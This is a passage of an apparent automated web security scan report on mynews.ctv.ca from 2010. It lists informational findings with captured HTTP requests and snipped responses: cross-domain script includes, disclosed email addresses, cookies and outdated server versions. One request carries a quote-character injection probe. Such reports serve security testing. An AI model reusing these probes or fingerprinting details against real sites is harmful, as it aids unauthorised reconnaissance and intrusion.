...[SNIP]... </script><script language="javascript1.1" src="http://www.ctv.ca ...[SNIP]... <div id="FilemobileGenuin <a href="http://www <img src="http://assets </a> ...[SNIP]... </style> <link href="http://www.ctv.ca <script type="text/javascript" src="http://www.ctv.ca/v2 ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://mynews.ctv.ca |
Path: | /mediaAll |
GET /mediaAll?siteT=&q=%27%27 Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Referer: http://mynews.ctv.ca Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: mynews.ctv.ca Proxy-Connection: Keep-Alive Cookie: __utma=67845710.776942626 |
HTTP/1.0 200 OK Date: Sat, 20 Nov 2010 04:56:20 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch X-Powered-By: PHP/5.2.6-1+lenny9 X-FM: www2 X-UA-Compatible: IE=Edge P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html; encoding=utf-8;charset X-Cache-Lookup: MISS from www2.filemobile.com:80 Via: 1.1 www2.filemobile.com:80 (squid/2.7.STABLE3) Connection: keep-alive Content-Length: 22023 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="X-UA <link rel="shortcut icon" href="http://assets <script type="text/javascript"> ...[SNIP]... </script> <script language="javascript1.1" src="http://www.ctv.ca ...[SNIP]... <![endif]--> <script language="JavaScript" type="text/javascript" src="http://www.ctv.ca ...[SNIP]... </style> <link rel="shortcut icon" href="http://images.ctv <script type="text/javascript" src="http://www.ctv.ca/v2 ...[SNIP]... <div class="fmContent"> <script language="javascript" type="text/javascript" src="http://assets <script language="javascript" type="text/javascript" src="http://assets ...[SNIP]... </a> <a href="http://www.newsstar <a href="http://www ...[SNIP]... <br/> <img src="http://assets </td> ...[SNIP]... <a href="/upload?siteT="> <img src="http://assets ...[SNIP]... </script><script language="javascript1.1" src="http://www.ctv.ca ...[SNIP]... <td id="mainTableRightCo <iframe src="http://www.ctv.ca ...[SNIP]... <div style="padding-left:5px; padding-top:6px; padding-right:4px"> <img src="http://assets ...[SNIP]... <td><img src="http://assets ...[SNIP]... <div id="FilemobileGenuin <a href="http://www <img src="http://assets </a> ...[SNIP]... </style> <link href="http://www.ctv.ca <script type="text/javascript" src="http://www.ctv.ca/v2 ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://mynews.ctv.ca |
Path: | /services/cssloader |
GET /services/cssloader?id Accept: */* Referer: http://www.ctv.ca/generic Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: mynews.ctv.ca Proxy-Connection: Keep-Alive Cookie: __utma=67845710.776942626 |
HTTP/1.0 404 Not Found Date: Sat, 20 Nov 2010 04:49:53 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g X-Powered-By: PHP/5.2.6-1+lenny9 X-FM: www1 ETag: 7b743de4c1d3f389c8fe Last-Modified: Sat, 20 Nov 2010 04:49:53 GMT Expires: Sat, 20 Nov 2010 04:59:53 GMT Cache-Control: private,max-age=600 Vary: Accept-Encoding Content-Type: text/css;charset=utf-8 X-Cache-Lookup: MISS from www1.filemobile.com:80 Via: 1.1 www1.filemobile.com:80 (squid/2.7.STABLE3) Connection: close Content-Length: 1337 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>FileM ...[SNIP]... <div style="font-family: sans-serif" ><img src="http://assets ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://mynews.ctv.ca |
Path: | /upload |
GET /upload?siteT= HTTP/1.1 Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Referer: http://mynews.ctv.ca Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: mynews.ctv.ca Proxy-Connection: Keep-Alive Pragma: no-cache Cookie: __utma=67845710.776942626 |
HTTP/1.0 200 OK Date: Sat, 20 Nov 2010 04:54:56 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch X-Powered-By: PHP/5.2.6-1+lenny9 X-FM: www2 X-UA-Compatible: IE=Edge P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html; encoding=utf-8;charset X-Cache-Lookup: MISS from www2.filemobile.com:80 Via: 1.1 www2.filemobile.com:80 (squid/2.7.STABLE3) Connection: keep-alive Content-Length: 29893 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="X-UA <link rel="shortcut icon" href="http://assets <script type="text/javascript"> ...[SNIP]... </script> <script language="javascript1.1" src="http://www.ctv.ca ...[SNIP]... <![endif]--> <script language="JavaScript" type="text/javascript" src="http://www.ctv.ca ...[SNIP]... </style> <link rel="shortcut icon" href="http://images.ctv <script type="text/javascript" src="http://www.ctv.ca/v2 ...[SNIP]... </script> <script src="http://maps.google <script src="http://assets ...[SNIP]... <a href="http://mynews.ctv <img src="http://assets ...[SNIP]... </a> <a href="http://www.newsstar <a href="http://www ...[SNIP]... <br/> <img src="http://assets </td> ...[SNIP]... </style> <link rel="stylesheet" type="text/css" media="screen" href="http://assets <span style="font-size: 17px; font-family: Arial, Helvetica, sans-serif"> ...[SNIP]... <td id="mainTableRightCo <iframe src="http://www.ctv.ca ...[SNIP]... <div style="padding-left:5px; padding-top:6px; padding-right:4px"> <img src="http://assets ...[SNIP]... <td><img src="http://assets ...[SNIP]... </script><script language="javascript1.1" src="http://www.ctv.ca ...[SNIP]... <div id="FilemobileGenuin <a href="http://www <img src="http://assets </a> ...[SNIP]... </style> <link href="http://www.ctv.ca <script type="text/javascript" src="http://www.ctv.ca/v2 ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://mynews.ctv.ca |
Path: | /upload |
GET /upload?siteT=toronto HTTP/1.1 Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Referer: http://toronto.ctv.ca Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: mynews.ctv.ca Proxy-Connection: Keep-Alive Cookie: __utma=67845710.776942626 |
HTTP/1.0 200 OK Date: Sat, 20 Nov 2010 04:52:02 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch X-Powered-By: PHP/5.2.6-1+lenny9 X-FM: www2 X-UA-Compatible: IE=Edge P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA" Set-Cookie: SABRE_ID=ce335cd6391 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html; encoding=utf-8;charset X-Cache-Lookup: MISS from www2.filemobile.com:80 Via: 1.1 www2.filemobile.com:80 (squid/2.7.STABLE3) Connection: keep-alive Content-Length: 42129 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="X-UA <link rel="shortcut icon" href="http://assets <script type="text/javascript"> ...[SNIP]... <head> <link rel="stylesheet" href="http://toronto.ctv <script type="text/javascript" src="http://toronto.ctv ...[SNIP]... </script> <script language="javascript1.1" src="http://www.ctv.ca ...[SNIP]... </style> <script language="JavaScript" type="text/javascript" src="http://www.ctv.ca ...[SNIP]... </script> <script src="http://assets ...[SNIP]... <body leftmargin="0" marginwidth="0" topmargin="0" marginheight="0"> <link rel="shortcut icon" href="http://images.ctv <table CELLPADDING="0" CELLSPACING="0" BORDER="0" > ...[SNIP]... <div style="background-image <a id="logo-zone" href="http://www.ctv.ca"></a> ...[SNIP]... <td> <img src="http://images.ctv.ca <div class="dropDownContainer" onMouseUp="event ...[SNIP]... <div style="margin-top: 3px"> <img src="http://images.ctv.ca </div> <div style="position: relative; margin-top: -13px"> <iframe src="http://www.ctv.ca ...[SNIP]... <td><a href="http://www.ctv.ca ...[SNIP]... <td style="padding-left: 2px"><a href="http://www.ctv.ca ...[SNIP]... <td style="padding-left: 2px"><a href="http://www.ctv.ca ...[SNIP]... <td style="padding-left: 2px"><a href="http://www.ctv.ca ...[SNIP]... <td style="padding-left: 2px"><a href="http://www.ctv.ca ...[SNIP]... <td style="padding-left: 2px"><a href="http://shows.ctv.ca ...[SNIP]... <td style="padding-left: 2px"><a href="http://www.ctv.ca ...[SNIP]... <td style="padding-left: 2px"><a href="http://www.ctv.ca ...[SNIP]... <td style="padding-left: 2px"><a href="http://www.ctv.ca ...[SNIP]... <td style="padding-left: 2px"><a href="http://www.ctv.ca ...[SNIP]... <td style="padding-left: 2px"><a href="http://autos.ctv.ca ...[SNIP]... <td style="padding-left: 2px"><a href="http://www.ctv.ca ...[SNIP]... <h1 class="fontSize1"><a href="http://toronto.ctv ...[SNIP]... <li><a href="http://toronto.ctv ...[SNIP]... <h3 class="fontSize1"><a href="http://toronto.ctv ...[SNIP]... <li><a href="http://toronto.ctv ...[SNIP]... <li><a href="http://toronto.ctv ...[SNIP]... <li><a href="http://toronto.ctv ...[SNIP]... <li><a href="http://dave.ctv.ca" class="underline">Dave Devall</a> ...[SNIP]... <h3 class="fontSize1"><a href="http://toronto.ctv ...[SNIP]... <li><a href="http://toronto.ctv ...[SNIP]... <li><a href="http://toronto.ctv ...[SNIP]... <li><a href="http://toronto.ctv ...[SNIP]... <h3 class="fontSize"><a href="http://toronto.ctv ...[SNIP]... <li><a href="http://toronto.ctv ...[SNIP]... <h3 class="fontSize1"><a href="http://toronto.ctv ...[SNIP]... <li><a href="http://toronto.ctv ...[SNIP]... <h3 class="fontSize1"><a href="http://toronto.ctv ...[SNIP]... <li><a href="http://toronto.ctv ...[SNIP]... <h3 class="fontSize"><a href="http://toronto.ctv ...[SNIP]... <li><a href="http://toronto.ctv ...[SNIP]... <li><a href="http://toronto.ctv ...[SNIP]... <h3 class="fontSize1"><a href="http://toronto.ctv ...[SNIP]... <li><a href="http://toronto.ctv ...[SNIP]... <li><a href="http://savelocal ...[SNIP]... <li><a href="http://50years ...[SNIP]... <li><a href="http://watch.ctv.ca ...[SNIP]... <h1 class="fontSize1"><a href="http://www.ctv.ca ...[SNIP]... <li><a href="http://www.ctv.ca <li><a href="http://twitter.com <li><a href="http://www.facebook <li><a href="http://www.ctv.ca ...[SNIP]... <li><a href="http://www.ctv.ca ...[SNIP]... <a href="/?siteT=toronto"><img src="http://assets ...[SNIP]... <a href="/upload?siteT <img src="http://assets ...[SNIP]... </a> <a href="http://www.newsstar <a href="http://www ...[SNIP]... <br/> <img src="http://assets </td> ...[SNIP]... <td id="mainTableRightCo <iframe src="http://www.ctv.ca ...[SNIP]... <div style="padding-left:5px; padding-top:6px; padding-right:4px"> <img src="http://assets ...[SNIP]... <td><img src="http://assets ...[SNIP]... </script><script language="javascript1.1" src="http://www.ctv.ca ...[SNIP]... <div id="FilemobileGenuin <a href="http://www <img src="http://assets </a> ...[SNIP]... </style> <link href="http://www.ctv.ca <script type="text/javascript" src="http://www.ctv.ca/v2 ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://mynews.ctv.ca |
Path: | //servlet/HTMLTemplate/ |
GET //servlet/HTMLTemplate/ Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Host: mynews.ctv.ca Cookie: __utma=67845710.776942626 |
HTTP/1.0 200 OK Date: Sat, 20 Nov 2010 04:59:41 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch X-Powered-By: PHP/5.2.6-1+lenny9 X-FM: www2 X-UA-Compatible: IE=Edge P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html; encoding=utf-8;charset X-Cache-Lookup: MISS from www2.filemobile.com:80 Via: 1.1 www2.filemobile.com:80 (squid/2.7.STABLE3) Connection: keep-alive Content-Length: 9414 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <met ...[SNIP]... </script> <script language="javascript1.1" src="http://www.ctv.ca ...[SNIP]... <![endif]--> <script language="JavaScript" type="text/javascript" src="http://www.ctv.ca ...[SNIP]... <link rel="shortcut icon" href="http://images.ctv <script type="text/javascript" src="http://www.ctv.ca/v2 ...[SNIP]... <link href="http://www.ctv.ca <script type="text/javascript" src="http://www.ctv.ca/v2 ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://mynews.ctv.ca |
Path: | /login |
GET /login?msg=incorrect Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Referer: http://mynews.ctv.ca Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: mynews.ctv.ca Proxy-Connection: Keep-Alive Pragma: no-cache Cookie: __utma=67845710.776942626 |
HTTP/1.0 200 OK Date: Sat, 20 Nov 2010 04:53:09 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch X-Powered-By: PHP/5.2.6-1+lenny9 X-FM: www2 X-UA-Compatible: IE=Edge P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html; encoding=utf-8;charset X-Cache-Lookup: MISS from www2.filemobile.com:80 Via: 1.1 www2.filemobile.com:80 (squid/2.7.STABLE3) Connection: keep-alive Content-Length: 28872 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <met ...[SNIP]... </script> <script language="javascript1.1" src="http://www.ctv.ca ...[SNIP]... <![endif]--> <script language="JavaScript" type="text/javascript" src="http://www.ctv.ca ...[SNIP]... <link rel="shortcut icon" href="http://images.ctv <script type="text/javascript" src="http://www.ctv.ca/v2 ...[SNIP]... </script><script language="javascript1.1" src="http://www.ctv.ca ...[SNIP]... <link href="http://www.ctv.ca <script type="text/javascript" src="http://www.ctv.ca/v2 ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://mynews.ctv.ca |
Path: | /mediaAll |
GET /mediaAll?siteT=&q=%27%27 Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Referer: http://mynews.ctv.ca Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: mynews.ctv.ca Proxy-Connection: Keep-Alive Cookie: __utma=67845710.776942626 |
HTTP/1.0 200 OK Date: Sat, 20 Nov 2010 04:56:20 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch X-Powered-By: PHP/5.2.6-1+lenny9 X-FM: www2 X-UA-Compatible: IE=Edge P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html; encoding=utf-8;charset X-Cache-Lookup: MISS from www2.filemobile.com:80 Via: 1.1 www2.filemobile.com:80 (squid/2.7.STABLE3) Connection: keep-alive Content-Length: 22023 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <met ...[SNIP]... </script> <script language="javascript1.1" src="http://www.ctv.ca ...[SNIP]... <![endif]--> <script language="JavaScript" type="text/javascript" src="http://www.ctv.ca ...[SNIP]... <link rel="shortcut icon" href="http://images.ctv <script type="text/javascript" src="http://www.ctv.ca/v2 ...[SNIP]... <div class="fmContent"> <script language="javascript" type="text/javascript" src="http://assets <script language="javascript" type="text/javascript" src="http://assets ...[SNIP]... </script><script language="javascript1.1" src="http://www.ctv.ca ...[SNIP]... <link href="http://www.ctv.ca <script type="text/javascript" src="http://www.ctv.ca/v2 ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://mynews.ctv.ca |
Path: | /upload |
GET /upload?siteT= HTTP/1.1 Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Referer: http://mynews.ctv.ca Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: mynews.ctv.ca Proxy-Connection: Keep-Alive Pragma: no-cache Cookie: __utma=67845710.776942626 |
HTTP/1.0 200 OK Date: Sat, 20 Nov 2010 04:54:56 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch X-Powered-By: PHP/5.2.6-1+lenny9 X-FM: www2 X-UA-Compatible: IE=Edge P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html; encoding=utf-8;charset X-Cache-Lookup: MISS from www2.filemobile.com:80 Via: 1.1 www2.filemobile.com:80 (squid/2.7.STABLE3) Connection: keep-alive Content-Length: 29893 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <met ...[SNIP]... </script> <script language="javascript1.1" src="http://www.ctv.ca ...[SNIP]... <![endif]--> <script language="JavaScript" type="text/javascript" src="http://www.ctv.ca ...[SNIP]... <link rel="shortcut icon" href="http://images.ctv <script type="text/javascript" src="http://www.ctv.ca/v2 ...[SNIP]... </script> <script src="http://maps.google <script src="http://assets ...[SNIP]... </script><script language="javascript1.1" src="http://www.ctv.ca ...[SNIP]... <link href="http://www.ctv.ca <script type="text/javascript" src="http://www.ctv.ca/v2 ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://mynews.ctv.ca |
Path: | /upload |
GET /upload?siteT=toronto HTTP/1.1 Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Referer: http://toronto.ctv.ca Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: mynews.ctv.ca Proxy-Connection: Keep-Alive Cookie: __utma=67845710.776942626 |
HTTP/1.0 200 OK Date: Sat, 20 Nov 2010 04:52:02 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch X-Powered-By: PHP/5.2.6-1+lenny9 X-FM: www2 X-UA-Compatible: IE=Edge P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA" Set-Cookie: SABRE_ID=ce335cd6391 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html; encoding=utf-8;charset X-Cache-Lookup: MISS from www2.filemobile.com:80 Via: 1.1 www2.filemobile.com:80 (squid/2.7.STABLE3) Connection: keep-alive Content-Length: 42129 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <met ...[SNIP]... <link rel="stylesheet" href="http://toronto.ctv <script type="text/javascript" src="http://toronto.ctv ...[SNIP]... </script> <script language="javascript1.1" src="http://www.ctv.ca ...[SNIP]... </style> <script language="JavaScript" type="text/javascript" src="http://www.ctv.ca ...[SNIP]... </script> <script src="http://assets ...[SNIP]... </script><script language="javascript1.1" src="http://www.ctv.ca ...[SNIP]... <link href="http://www.ctv.ca <script type="text/javascript" src="http://www.ctv.ca/v2 ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://mynews.ctv.ca |
Path: | //servlet/HTMLTemplate/ |
GET //servlet/HTMLTemplate/ Host: mynews.ctv.ca Proxy-Connection: keep-alive Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.0 200 OK Date: Sat, 20 Nov 2010 05:00:03 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch X-Powered-By: PHP/5.2.6-1+lenny9 X-FM: www2 X-UA-Compatible: IE=Edge P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA" Set-Cookie: SABRE_ID=c34988c1bda Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html; encoding=utf-8;charset X-Cache-Lookup: MISS from www2.filemobile.com:80 Via: 1.1 www2.filemobile.com:80 (squid/2.7.STABLE3) Connection: keep-alive Content-Length: 9251 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <met ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://mynews.ctv.ca |
Path: | /upload |
GET /upload?siteT=toronto HTTP/1.1 Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Referer: http://toronto.ctv.ca Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: mynews.ctv.ca Proxy-Connection: Keep-Alive Cookie: __utma=67845710.776942626 |
HTTP/1.0 200 OK Date: Sat, 20 Nov 2010 04:52:02 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch X-Powered-By: PHP/5.2.6-1+lenny9 X-FM: www2 X-UA-Compatible: IE=Edge P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA" Set-Cookie: SABRE_ID=ce335cd6391 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html; encoding=utf-8;charset X-Cache-Lookup: MISS from www2.filemobile.com:80 Via: 1.1 www2.filemobile.com:80 (squid/2.7.STABLE3) Connection: keep-alive Content-Length: 42129 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <met ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://mynews.ctv.ca |
Path: | /login |
GET /login?msg=incorrect Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Referer: http://mynews.ctv.ca Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: mynews.ctv.ca Proxy-Connection: Keep-Alive Pragma: no-cache Cookie: __utma=67845710.776942626 |
HTTP/1.0 200 OK Date: Sat, 20 Nov 2010 04:53:09 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch X-Powered-By: PHP/5.2.6-1+lenny9 X-FM: www2 X-UA-Compatible: IE=Edge P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html; encoding=utf-8;charset X-Cache-Lookup: MISS from www2.filemobile.com:80 Via: 1.1 www2.filemobile.com:80 (squid/2.7.STABLE3) Connection: keep-alive Content-Length: 28872 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <met ...[SNIP]... <p style="margin-top: 5px; margin-left: 10px">e.g. yourname@yourdomain.com</p> ...[SNIP]... <a href="mailto:mynews@ctv.ca">mynews@ctv.ca</a> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://mynews.ctv.ca |
Path: | /mediaAll |
GET /mediaAll?siteT=&q=%27%27 Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Referer: http://mynews.ctv.ca Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: mynews.ctv.ca Proxy-Connection: Keep-Alive Cookie: __utma=67845710.776942626 |
HTTP/1.0 200 OK Date: Sat, 20 Nov 2010 04:56:20 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch X-Powered-By: PHP/5.2.6-1+lenny9 X-FM: www2 X-UA-Compatible: IE=Edge P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html; encoding=utf-8;charset X-Cache-Lookup: MISS from www2.filemobile.com:80 Via: 1.1 www2.filemobile.com:80 (squid/2.7.STABLE3) Connection: keep-alive Content-Length: 22023 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <met ...[SNIP]... <a href="mailto:mynews@ctv.ca">mynews@ctv.ca</a> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://mynews.ctv.ca |
Path: | /services/jslibrary |
GET /services/jslibrary HTTP/1.1 Accept: */* Referer: http://www.ctv.ca/generic Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: mynews.ctv.ca Proxy-Connection: Keep-Alive Cookie: __utma=67845710.776942626 |
